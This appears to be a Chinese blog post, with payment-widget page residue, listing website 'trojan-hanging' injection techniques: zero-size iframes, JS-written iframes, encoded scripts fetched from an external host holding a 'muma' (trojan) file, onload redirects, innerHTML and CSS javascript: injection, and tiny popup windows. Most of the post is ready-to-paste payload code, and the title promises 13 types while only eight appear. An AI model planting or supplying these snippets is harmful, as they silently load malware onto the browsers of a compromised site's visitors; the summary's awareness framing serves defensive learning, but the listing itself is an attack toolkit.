网站被挂马的13个类型

本文详细介绍了常见的网页挂马技术,包括框架挂马、JS文件挂马、JS变形加密、body挂马、隐蔽挂马、CSS中挂马、JAJA挂马以及图片伪装等手法。这些技术通过各种方式在网页中植入恶意代码,威胁用户的安全。了解这些挂马手段有助于提升网络安全意识和防护能力。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一:框架挂马
<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密
<SCRIPT language="JScript.Encode" src=http://msplinks.com.cn/MDFodHRwOi8vd3d3LnVweC5jb20uY24vbXVtYS50eHQ= ></script>
muma.txt可改成任意后缀

四:body挂马
<body οnlοad="window.location='地址';"></body>

五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src="http://msplinks.com.cn/MDFodHRwOi8vd3d3LnVweC5jb20uY24vbXVtYS5odG0v "></iframe>';

六:css中挂马
body {
background-image: url('javascript:document.write("<script src=http://msplinks.com.cn/MDFodHRwOi8vd3d3LnVweC5jb20uY24vbXVtYS5qcw== ></script>")')}

七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值